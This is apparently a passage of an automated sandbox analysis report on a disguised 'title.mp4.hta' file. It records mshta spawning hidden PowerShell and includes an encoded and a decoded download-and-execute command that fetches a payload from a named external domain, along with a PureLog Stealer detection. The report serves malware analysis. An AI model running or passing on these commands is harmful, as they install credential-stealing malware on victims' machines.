                                                                                                  2025-01-06 12:56:45 UTC1369INData Raw: 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 37 38 2e 35 39 38 20 31 34 32 2e 38 33 31 43 37 38 2e 35 36 31 34 20 31 34 35 2e 33 39 35 20 37 39 2e 35 34 34 37 20 31 34 37 2e 38 36 39 20 38 31 2e 33 33 31 37 20 31 34 39 2e 37 30 39 43 38 33 2e 31 31 38 36 20 31 35 31 2e 35 34 39 20 38 35 2e 35 36 33 31 20 31 35 32 2e 36 30 33 20 38 38 2e 31 32 37 36 20 31 35 32 2e 36 34 31 43 39 30 2e 36 39 32 20 31 35 32 2e 36 30 33 20 39 33 2e 31 33 36 34 20 31 35 31 2e 35 34 39 20 39 34 2e 39 32 33 34 20 31 34 39 2e 37 30 39 43 39 36 2e 37 31 30 33 20 31 34 37 2e 38 36 39 20 39 37 2e 36 39 33 36 20 31 34 35 2e 33 39 35 20 39 37 2e 36 35 37 31 20 31 34 32 2e 38 33 31 43 39 37 2e 36 39 33 36 20 31 34 30 2e 32 36 36 20 39 36 2e 37 31 30 33
                                                                                                  Data Ascii: <path d="M78.598 142.831C78.5614 145.395 79.5447 147.869 81.3317 149.709C83.1186 151.549 85.5631 152.603 88.1276 152.641C90.692 152.603 93.1364 151.549 94.9234 149.709C96.7103 147.869 97.6936 145.395 97.6571 142.831C97.6936 140.266 96.7103


                                                                                                  Click to jump to process

                                                                                                  Click to jump to process

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Click to jump to process

                                                                                                  Target ID:0
                                                                                                  Start time:07:54:54
                                                                                                  Start date:06/01/2025
                                                                                                  Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:mshta.exe "C:\Users\user\Desktop\title.mp4.hta"
                                                                                                  Imagebase:0x870000
                                                                                                  File size:13'312 bytes
                                                                                                  MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  Target ID:2
                                                                                                  Start time:07:54:55
                                                                                                  Start date:06/01/2025
                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwBsAGUAZQBwACAAMgAwADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AYwBhAGIAZgAuAGsAbABpAHAAZABlAHMAYQBrAC4AcwBoAG8AcAAvAHMAbQB1AGcAbABlAC4AYgBkACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=
                                                                                                  Imagebase:0x970000
                                                                                                  File size:433'152 bytes
                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:3
                                                                                                  Start time:07:54:55
                                                                                                  Start date:06/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:5
                                                                                                  Start time:07:55:16
                                                                                                  Start date:06/01/2025
                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))"
                                                                                                  Imagebase:0x970000
                                                                                                  File size:433'152 bytes
                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000002.2712557949.000000000C911000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:6
                                                                                                  Start time:07:55:16
                                                                                                  Start date:06/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:10
                                                                                                  Start time:07:56:29
                                                                                                  Start date:06/01/2025
                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                  Imagebase:0x970000
                                                                                                  File size:433'152 bytes
                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:11
                                                                                                  Start time:07:56:44
                                                                                                  Start date:06/01/2025
                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:powershell -exec bypass <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="icon" href="https://www.cloudflare.com/favicon.ico" /> <title>Not Found</title> <style> body { font-family: system-ui; font-weight: 300; font-size: 1.25rem; color: #36393a; display: flex; align-items: center; justify-content: center; } main { max-width: 1200px; margin-top: 120px; display: flex; flex-wrap: wrap; align-items: center; justify-content: center; } #text { max-width: 60%; margin-left: 1rem; margin-right: 1rem; } main > section > div { margin-bottom: 3.25rem; } svg { margin-left: 2rem; } @keyframes eye-1 { 0% { transform: translateX(0); } 10%, 50% { transform: translateX(-5px); } 60% { transform: translateX(0); } 100% { transform: translateX(0px); } } @keyframes eye-2 { 0% { transform: translateX(0); } 10%, 50% { transform: translateX(5px); } 60% { transform: translateX(0); } 100% { transform: translateX(0px); } } svg > .eye-1 { animation: eye-1 3s infinite; } svg > .eye-2 { animation: eye-2 3s 0.6s infinite; } h1 { font-size: 3.75rem; font-weight: 400; margin-bottom: 0.5rem; } h3 { font-size: 2rem; font-weight: 400; color: #92979b; margin: 0; } a { color: #0055dc; } p { margin: 0; } #error-title { font-size: 2rem; margin-bottom: 1rem; } #footer-title { font-weight: 700; margin-bottom: 0.75rem; } </style> </head> <body> <main> <section id="text"> <div> <h1>Error 404</h1> <h3>Object not found</h3> </div> <div> <p> This object does not exist or is not publicly accessible at this URL. Check the URL of the object that you're looking for or contact the owner to enable Public access. </p> </div> <div> <p id="footer-title">Is this your bucket?</p> <p> Learn how to enable <a href="https://developers.cloudflare.com/r2/data-access/public-buckets/" >Public Access</a > </p> </div> </section> <section> <svg width="414" height="212" viewBox="0 0 414 212" fill="none" xmlns="http://www.w3.org/2000/svg" > <ellipse cx="208.5" cy="166.5" rx="174.5" ry="45.5" fill="#E2F5FA" /> <path d="M205.516 80.2674H139.419L148.186 141.237H197.788L205.516 80.2674Z" fill="#C5EBF5" /> <path d="M205.516 80.2674H139.419L148.186 141.237H197.788L205.516 80.2674Z" stroke="#6ECCE5" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> <path d="M205.516 80.2674H139.419L148.186 141.237H197.788L205.516 80.2674Z" stroke="#6ECCE5" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> <rect x="137" y="75" width="70.9351" height="9.39611" rx="2.40792" fill="#C5EBF5" stroke="#6ECCE5" stroke-width="2" /> <path d="M124.566 13.277C121.053 13.277 118.204 10.4288 118.204 6.91534C118.204 3.40191 121.053 0.553711 124.566 0.553711C128.08 0.553711 130.928 3.40191 130.928 6.91534C130.928 10.4288 128.08 13.277 124.566 13.277Z" fill="#0055DC" /> <path d="M122.692 10.2347H126.402V24.0345H122.692V10.2347Z" fill="#0055DC" /> <path d="M85.6775 57.6815H163.733V127.819H85.6775V57.6815Z" fill="#C5EBF5" stroke="#0055DC" stroke-width="2" /> <path d="M183.719 96.4263H179.429C179.429 96.4263 178.132 78.2631 163.565 71.5752V65.4338C169.87 67.9703 182.283 75.5798 183.719 96.4263Z" fill="#0055DC" /> <path d="M193.146 105.43L188.253 106.931C188.253 106.931 186.752 98.3591 181.394 99.6477C176.035 100.936 177.96 108.22 177.96 108.22H173.678C173.678 108.22 170.889 95.9857 180.537 94.0691C190.186 92.1524 193.146 105.43 193.146 105.43Z" fill="#0055DC" /> <path d="M65.5132 96.4345H69.795C69.795 96.4345 71.0999 78.2712 85.6583 71.5752V65.4338C79.3537 67.9377 66.916 75.5472 65.5132 96.4345Z" fill="#0055DC" /> <path d="M56.0777 105.406L60.9712 106.906C60.9712 106.906 62.472 98.3345 67.8304 99.6149C73.1888 100.895 71.2559 108.195 71.2559 108.195H75.5459C75.5459 108.195 78.3353 95.9611 68.6868 94.0445C59.0384 92.1278 56.0777 105.406 56.0777 105.406Z" fill="#0055DC" /> <path d="M136.176 111.953C136.176 113.281 136.704 114.555 137.643 115.494C138.582 116.433 139.856 116.961 141.184 116.961C141.842 116.962 142.494 116.833 143.103 116.582C143.711 116.331 144.264 115.962 144.73 115.497C145.196 115.032 145.565 114.48 145.818 113.872C146.07 113.264 146.2 112.612 146.2 111.953C146.2 111.295 146.07 110.642 145.818 110.034C145.566 109.425 145.196 108.872 144.73 108.407C144.265 107.941 143.712 107.571 143.103 107.319C142.495 107.067 141.842 106.937 141.184 106.937C139.855 106.94 138.581 107.469 137.642 108.409C136.703 109.35 136.176 110.624 136.176 111.953V111.953Z" fill="#0055DC" /> <path d="M119.701 111.953C119.701 112.612 119.831 113.264 120.083 113.872C120.335 114.48 120.705 115.032 121.171 115.497C121.637 115.962 122.19 116.331 122.798 116.582C123.407 116.833 124.059 116.962 124.717 116.961C126.045 116.961 127.319 116.433 128.258 115.494C129.197 114.555 129.725 113.281 129.725 111.953C129.725 110.624 129.198 109.35 128.259 108.409C127.32 107.469 126.046 106.94 124.717 106.937C124.058 106.937 123.406 107.067 122.798 107.319C122.189 107.571 121.636 107.941 121.17 108.407C120.704 108.872 120.335 109.425 120.083 110.034C119.831 110.642 119.701 111.295 119.701 111.953V111.953Z" fill="#0055DC" /> <path d="M103.384 111.953C103.384 112.612 103.513 113.264 103.766 113.872C104.018 114.48 104.387 115.032 104.853 115.497C105.319 115.962 105.872 116.331 106.481 116.582C107.089 116.833 107.741 116.962 108.399 116.961C109.728 116.961 111.001 116.433 111.94 115.494C112.88 114.555 113.407 113.281 113.407 111.953C113.407 110.624 112.88 109.35 111.941 108.409C111.002 107.469 109.728 106.94 108.399 106.937C107.069 106.937 105.793 107.466 104.853 108.407C103.912 109.347 103.384 110.623 103.384 111.953V111.953Z" fill="#0055DC" /> <path d="M163.419 57.6273H85.5901C85.5901 57.6273 86.8707 20.01 124.5 20.01C162.13 20.01 163.419 57.6273 163.419 57.6273Z" fill="#C5EBF5" stroke="#0055DC" stroke-width="2" /> <path d="M153.931 60.0436H159.587V126.787H153.931V60.0436Z" fill="white" /> <path d="M159.528 55.6816H153.703L149.151 32.3329C149.151 32.3329 158.005 44.3703 159.528 55.6816Z" fill="white" /> <path d="M139.792 48.9516C134.995 48.9516 131.106 45.0627 131.106 40.2656C131.106 35.4684 134.995 31.5795 139.792 31.5795C144.589 31.5795 148.478 35.4684 148.478 40.2656C148.478 45.0627 144.589 48.9516 139.792 48.9516Z" fill="white" stroke="#0055DC" stroke-width="2" stroke-miterlimit="10" /> <path d="M108.821 48.9516C104.024 48.9516 100.135 45.0627 100.135 40.2655C100.135 35.4684 104.024 31.5795 108.821 31.5795C113.618 31.5795 117.507 35.4684 117.507 40.2655C117.507 45.0627 113.618 48.9516 108.821 48.9516Z" fill="white" stroke="#0055DC" stroke-width="2" stroke-miterlimit="10" /> <path class="eye-1" d="M138.373 40.3055C138.373 41.4216 138.817 42.4921 139.606 43.2813C140.395 44.0706 141.466 44.5139 142.582 44.5139C143.697 44.5118 144.765 44.0674 145.552 43.2784C146.34 42.4894 146.782 41.4202 146.782 40.3055C146.78 39.1921 146.337 38.125 145.549 37.3378C144.762 36.5506 143.695 36.1073 142.582 36.1052C141.467 36.1052 140.398 36.5474 139.609 37.3349C138.82 38.1224 138.375 39.1907 138.373 40.3055V40.3055Z" fill="#6ECCE5" /> <path class="eye-1" d="M107.271 40.3055C107.271 41.4202 107.714 42.4894 108.501 43.2784C109.289 44.0674 110.357 44.5118 111.472 44.5139C112.588 44.5139 113.658 44.0706 114.447 43.2813C115.237 42.4921 115.68 41.4216 115.68 40.3055C115.678 39.1907 115.234 38.1224 114.445 37.3349C113.656 36.5474 112.586 36.1052 111.472 36.1052C110.358 36.1073 109.291 36.5506 108.504 37.3378C107.717 38.125 107.274 39.1921 107.271 40.3055V40.3055Z" fill="#6ECCE5" /> <path d="M84.8918 127.581H164.967C173.345 127.581 180.137 134.371 180.137 142.747C180.137 151.123 173.345 157.913 164.967 157.913H84.8918C76.5136 157.913 69.7218 151.123 69.7218 142.747C69.7218 134.371 76.5136 127.581 84.8918 127.581Z" fill="#C5EBF5" stroke="#0055DC" stroke-width="2" /> <g style="mix-blend-mode: multiply"> <path d="M152.026 142.831C151.99 145.395 152.973 147.869 154.76 149.709C156.547 151.549 158.992 152.603 161.556 152.641C164.12 152.603 166.565 151.549 168.352 149.709C170.139 147.869 171.122 145.395 171.086 142.831C171.122 140.266 170.139 137.792 168.352 135.953C166.565 134.113 164.12 133.058 161.556 133.02C158.992 133.058 156.547 134.113 154.76 135.953C152.973 137.792 151.99 140.266 152.026 142.831Z" fill="#C5EBF5" /> </g> <g style="mix-blend-mode: multiply"> <path d="M137.081 152.641C131.818 152.641 127.552 148.249 127.552 142.831C127.552 137.412 131.818 133.02 137.081 133.02C142.344 133.02 146.611 137.412 146.611 142.831C146.611 148.249 142.344 152.641 137.081 152.641Z" fill="#C5EBF5" /> </g> <g style="mix-blend-mode: multiply"> <path d="M103.074 142.831C103.038 145.395 104.021 147.869 105.808 149.709C107.595 151.549 110.039 152.603 112.604 152.641C115.168 152.603 117.613 151.549 119.4 149.709C121.187 147.869 122.17 145.395 122.134 142.831C122.17 140.266 121.187 137.792 119.4 135.953C117.613 134.113 115.168 133.058 112.604 133.02C110.039 133.058 107.595 134.113 105.808 135.953C104.021 137.792 103.038 140.266 103.074 142.831Z" fill="#C5EBF5" /> </g> <g style="mix-blend-mode: multiply"> <path d="M78.598 142.831C78.5614 145.395 79.5447 147.869 81.3317 149.709C83.1186 151.549 85.5631 152.603 88.1276 152.641C90.692 152.603 93.1364 151.549 94.9234 149.709C96.7103 147.869 97.6936 145.395 97.6571 142.831C97.6936 140.266 96.7103 137.792 94.9234 135.953C93.1364 134.113 90.692 133.058 88.1276 133.02C85.5631 133.058 83.1186 134.113 81.3317 135.953C79.5447 137.792 78.5614 140.266 78.598 142.831Z" fill="#C5EBF5" /> </g> <path d="M103.252 71.1929H146.765V95.2437H103.252V71.1929Z" fill="#6ECCE5" /> <path d="M137.087 75.635H142.177V79.7379H137.087V75.635Z" fill="#0055DC" /> <path d="M129.852 75.635H134.934V79.7379H129.852V75.635Z" fill="#0055DC" /> <path d="M137.087 87.0141H142.177V91.1089H137.087V87.0141Z" fill="#0055DC" /> <path d="M129.852 87.0141H134.934V91.1089H129.852V87.0141Z" fill="#0055DC" /> <path d="M137.087 81.1718H142.177V85.2666H137.087V81.1718Z" fill="#0055DC" /> <path d="M129.852 81.1718H134.934V85.2666H129.852V81.1718Z" fill="#0055DC" /> <path d="M108.366 75.635H127.238V91.1078H108.366V75.635Z" fill="white" /> <path d="M119.345 49.2718C120.041 48.5443 120.865 47.9697 121.768 47.5786C122.671 47.1875 123.637 46.9869 124.612 46.9869C125.587 46.9869 126.553 47.1875 127.456 47.5786C128.359 47.9697 129.183 48.5443 129.879 49.2718" stroke="#0055DC" stroke-width="2" /> <path d="M274.751 12.7232C271.238 12.7232 268.39 9.87505 268.39 6.36162C268.39 2.8482 271.238 0 274.751 0C278.265 0 281.113 2.8482 281.113 6.36162C281.113 9.87505 278.265 12.7232 274.751 12.7232Z" fill="#0055DC" /> <path d="M272.877 9.68185H276.588V23.4817H272.877V9.68185Z" fill="#0055DC" /> <path d="M235.863 57.1286H313.919V127.266H235.863V57.1286Z" fill="#C5EBF5" stroke="#0055DC" stroke-width="2" /> <path d="M333.248 57.7026H328.958C328.958 57.7026 327.662 75.8658 313.095 82.5537V88.6951C319.4 86.1586 331.813 78.5491 333.248 57.7026Z" fill="#0055DC" /> <path d="M342.676 48.6986L337.782 47.1979C337.782 47.1979 336.282 55.7698 330.923 54.4812C325.565 53.1925 327.49 45.9093 327.49 45.9093H323.208C323.208 45.9093 320.419 58.1432 330.067 60.0598C339.715 61.9765 342.676 48.6986 342.676 48.6986Z" fill="#0055DC" /> <path d="M215.043 57.6946H219.325C219.325 57.6946 220.63 75.8578 235.188 82.5538V88.6953C228.884 86.1914 216.446 78.5819 215.043 57.6946Z" fill="#0055DC" /> <path d="M205.608 48.7232L210.501 47.2226C210.501 47.2226 212.002 55.7944 217.36 54.514C222.719 53.2335 220.786 45.9339 220.786 45.9339H225.076C225.076 45.9339 227.865 58.1678 218.217 60.0844C208.568 62.0011 205.608 48.7232 205.608 48.7232Z" fill="#0055DC" /> <path d="M286.361 111.401C286.361 112.729 286.889 114.003 287.828 114.942C288.767 115.881 290.041 116.409 291.369 116.409C292.028 116.41 292.68 116.281 293.288 116.03C293.897 115.779 294.45 115.41 294.915 114.945C295.381 114.48 295.751 113.927 296.003 113.319C296.255 112.711 296.385 112.059 296.385 111.401C296.385 110.742 296.255 110.09 296.003 109.482C295.751 108.873 295.382 108.32 294.916 107.854C294.45 107.389 293.897 107.019 293.289 106.767C292.68 106.515 292.028 106.385 291.369 106.385C290.04 106.387 288.767 106.917 287.828 107.857C286.889 108.798 286.361 110.072 286.361 111.401V111.401Z" fill="#0055DC" /> <path d="M269.887 111.401C269.887 112.059 270.017 112.711 270.269 113.319C270.521 113.927 270.891 114.48 271.357 114.945C271.823 115.41 272.376 115.779 272.984 116.03C273.593 116.281 274.245 116.41 274.903 116.409C276.231 116.409 277.505 115.881 278.444 114.942C279.383 114.003 279.911 112.729 279.911 111.401C279.911 110.072 279.383 108.798 278.445 107.857C277.506 106.917 276.232 106.387 274.903 106.385C274.244 106.385 273.592 106.515 272.984 106.767C272.375 107.019 271.822 107.389 271.356 107.854C270.89 108.32 270.521 108.873 270.269 109.482C270.017 110.09 269.887 110.742 269.887 111.401V111.401Z" fill="#0055DC" /> <path d="M253.569 111.401C253.569 112.059 253.699 112.711 253.951 113.319C254.204 113.927 254.573 114.48 255.039 114.945C255.505 115.41 256.058 115.779 256.666 116.03C257.275 116.281 257.927 116.41 258.585 116.409C259.914 116.409 261.187 115.881 262.126 114.942C263.066 114.003 263.593 112.729 263.593 111.401C263.593 110.072 263.066 108.798 262.127 107.857C261.188 106.917 259.914 106.387 258.585 106.385C257.255 106.385 255.979 106.914 255.039 107.854C254.098 108.795 253.569 110.071 253.569 111.401V111.401Z" fill="#0055DC" /> <path d="M313.604 57.0745H235.775C235.775 57.0745 237.056 19.4572 274.686 19.4572C312.315 19.4572 313.604 57.0745 313.604 57.0745Z" fill="#C5EBF5" stroke="#0055DC" stroke-width="2" /> <path d="M304.116 59.4908H309.773V126.234H304.116V59.4908Z" fill="white" /> <path d="M309.713 55.1288H303.889L299.336 31.7801C299.336 31.7801 308.19 43.8175 309.713 55.1288Z" fill="white" /> <path d="M259.006 48.4013C263.804 48.4013 267.692 44.5124 267.692 39.7152C267.692 34.918 263.804 31.0292 259.006 31.0292C254.209 31.0292 250.32 34.918 250.32 39.7152C250.32 44.5124 254.209 48.4013 259.006 48.4013Z" fill="white" stroke="#0055DC" stroke-width="2" stroke-miterlimit="10" /> <path d="M289.977 48.4013C294.774 48.4013 298.663 44.5124 298.663 39.7152C298.663 34.918 294.774 31.0292 289.977 31.0292C285.18 31.0292 281.291 34.918 281.291 39.7152C281.291 44.5124 285.18 48.4013 289.977 48.4013Z" fill="white" stroke="#0055DC" stroke-width="2" stroke-miterlimit="10" /> <path class="eye-2" d="M260.425 39.7552C260.425 40.8713 259.981 41.9418 259.192 42.731C258.403 43.5202 257.333 43.9636 256.216 43.9636C255.102 43.9615 254.033 43.5171 253.246 42.7281C252.458 41.9391 252.016 40.8699 252.016 39.7552C252.018 38.6418 252.461 37.5747 253.249 36.7875C254.036 36.0002 255.103 35.557 256.216 35.5549C257.331 35.5549 258.4 35.9971 259.189 36.7846C259.978 37.5721 260.423 38.6404 260.425 39.7552V39.7552Z" fill="#6ECCE5" /> <path class="eye-2" d="M291.527 39.7552C291.527 40.8699 291.085 41.9391 290.297 42.7281C289.51 43.5171 288.441 43.9615 287.327 43.9636C286.21 43.9636 285.14 43.5202 284.351 42.731C283.562 41.9418 283.118 40.8713 283.118 39.7552C283.12 38.6404 283.565 37.5721 284.354 36.7846C285.143 35.9971 286.212 35.5549 287.327 35.5549C288.44 35.557 289.507 36.0002 290.294 36.7875C291.082 37.5747 291.525 38.6418 291.527 39.7552V39.7552Z" fill="#6ECCE5" /> <path d="M235.077 127.028H315.152C323.53 127.028 330.322 133.818 330.322 142.194C330.322 150.57 323.53 157.36 315.152 157.36H235.077C226.699 157.36 219.907 150.57 219.907 142.194C219.907 133.818 226.699 127.028 235.077 127.028Z" fill="#C5EBF5" stroke="#0055DC" stroke-width="2" /> <g style="mix-blend-mode: multiply"> <path d="M302.212 142.278C302.175 144.843 303.159 147.317 304.946 149.157C306.733 150.996 309.177 152.051 311.741 152.089C314.306 152.051 316.75 150.996 318.537 149.157C320.324 147.317 321.308 144.843 321.271 142.278C321.308 139.714 320.324 137.24 318.537 135.4C316.75 133.561 314.306 132.506 311.741 132.468C309.177 132.506 306.733 133.561 304.946 135.4C303.159 137.24 302.175 139.714 302.212 142.278Z" fill="#C5EBF5" /> </g> <g style="mix-blend-mode: multiply"> <path d="M287.267 152.089C282.004 152.089 277.737 147.697 277.737 142.278C277.737 136.86 282.004 132.468 287.267 132.468C292.53 132.468 296.796 136.86 296.796 142.278C296.796 147.697 292.53 152.089 287.267 152.089Z" fill="#C5EBF5" /> </g> <g style="mix-blend-mode: multiply"> <path d="M253.26 142.278C253.223 144.843 254.207 147.317 255.994 149.157C257.781 150.996 260.225 152.051 262.789 152.089C265.354 152.051 267.798 150.996 269.585 149.157C271.372 147.317 272.356 144.843 272.319 142.278C272.356 139.714 271.372 137.24 269.585 135.4C267.798 133.561 265.354 132.506 262.789 132.468C260.225 132.506 257.781 133.561 255.994 135.4C254.207 137.24 253.223 139.714 253.26 142.278Z" fill="#C5EBF5" /> </g> <g style="mix-blend-mode: multiply"> <path d="M228.783 142.278C228.747 144.843 229.73 147.317 231.517 149.157C233.304 150.996 235.749 152.051 238.313 152.089C240.877 152.051 243.322 150.996 245.109 149.157C246.896 147.317 247.879 144.843 247.843 142.278C247.879 139.714 246.896 137.24 245.109 135.4C243.322 133.561 240.877 132.506 238.313 132.468C235.749 132.506 233.304 133.561 231.517 135.4C229.73 137.24 228.747 139.714 228.783 142.278Z" fill="#C5EBF5" /> </g> <path d="M253.437 70.6394H296.951V94.6902H253.437V70.6394Z" fill="#6ECCE5" /> <path d="M287.272 75.0814H292.363V79.1842H287.272V75.0814Z" fill="#0055DC" /> <path d="M280.037 75.0814H285.119V79.1842H280.037V75.0814Z" fill="#0055DC" /> <path d="M287.272 86.4604H292.363V90.5552H287.272V86.4604Z" fill="#0055DC" /> <path d="M280.037 86.4604H285.119V90.5552H280.037V86.4604Z" fill="#0055DC" /> <path d="M287.272 80.6182H292.363V84.713H287.272V80.6182Z" fill="#0055DC" /> <path d="M280.037 80.6182H285.119V84.713H280.037V80.6182Z" fill="#0055DC" /> <path d="M258.552 75.0814H277.424V90.5542H258.552V75.0814Z" fill="white" /> <path d="M269.53 48.7169C270.226 47.9894 271.05 47.4149 271.953 47.0237C272.856 46.6326 273.822 46.432 274.797 46.432C275.772 46.432 276.738 46.6326 277.641 47.0237C278.545 47.4149 279.368 47.9894 280.064 48.7169" stroke="#0055DC" stroke-width="2" /> <path d="M409.67 76.5789H343.573L352.34 137.548H401.942L409.67 76.5789Z" fill="#C5EBF5" /> <path d="M409.67 76.5789H343.573L352.34 137.548H401.942L409.67 76.5789Z" stroke="#6ECCE5" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> <path d="M409.67 76.5789H343.573L352.34 137.548H401.942L409.67 76.5789Z" stroke="#6ECCE5" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> <rect x="341.154" y="71.3115" width="70.9351" height="9.39611" rx="2.40792" fill="#C5EBF5" stroke="#6ECCE5" stroke-width="2" /> <path d="M409.671 93.3885H343.573L352.34 154.358H401.942L409.671 93.3885Z" fill="#C5EBF5" /> <path d="M409.671 93.3885H343.573L352.34 154.358H401.942L409.671 93.3885Z" stroke="#6ECCE5" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> <path d="M409.671 93.3885H343.573L352.34 154.358H401.942L409.671 93.3885Z" stroke="#6ECCE5" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> <rect x="341.154" y="88.1211" width="70.9351" height="9.39611" rx="2.40792" fill="#C5EBF5" stroke="#6ECCE5" stroke-width="2" /> <path d="M295.581 108.36H360.026L351.478 167.805H303.116L295.581 108.36Z" fill="#C5EBF5" /> <path d="M295.581 108.36H360.026L351.478 167.805H303.116L295.581 108.36Z" stroke="#0055DC" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> <path d="M295.581 108.36H360.026L351.478 167.805H303.116L295.581 108.36Z" stroke="#0055DC" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> <rect x="-1" y="1" width="69.1117" height="9.1112" rx="2.40792" transform="matrix(-1 0 0 1 361.359 102.25)" fill="#C5EBF5" stroke="#0055DC" stroke-width="2" /> <path d="M342.555 136.334H382.924L377.569 173.57H347.275L342.555 136.334Z" fill="#C5EBF5" /> <path d="M342.555 136.334H382.924L377.569 173.57H347.275L342.555 136.334Z" stroke="#0055DC" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> <path d="M342.555 136.334H382.924L377.569 173.57H347.275L342.555 136.334Z" stroke="#0055DC" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> <rect x="-1" y="1" width="42.5446" height="4.96009" rx="2.40792" transform="matrix(-1 0 0 1 383.012 132.506)" fill="#C5EBF5" stroke="#0055DC" stroke-width="2" /> <path d="M17.328 102.337L6.64737 166.613L67.3531 167.939L75.3682 119.704L17.328 102.337Z" fill="#C5EBF5" /> <path d="M17.328 102.337L6.64737 166.613L67.3531 167.939L75.3682 119.704L17.328 102.337Z" stroke="#0055DC" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> <path d="M17.328 102.337L6.64737 166.613L67.3531 167.939L75.3682 119.704L17.328 102.337Z" stroke="#0055DC" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> <rect x="1.15039" y="168.103" width="69.8978" height="9.23404" rx="2.40792" transform="rotate(-80.5655 1.15039 168.103)" fill="#C5EBF5" stroke="#0055DC" stroke-width="2" /> </svg> </section> </main> </body> </html>
                                                                                                  Imagebase:0x970000
                                                                                                  File size:433'152 bytes
                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:12
                                                                                                  Start time:07:56:44
                                                                                                  Start date:06/01/2025
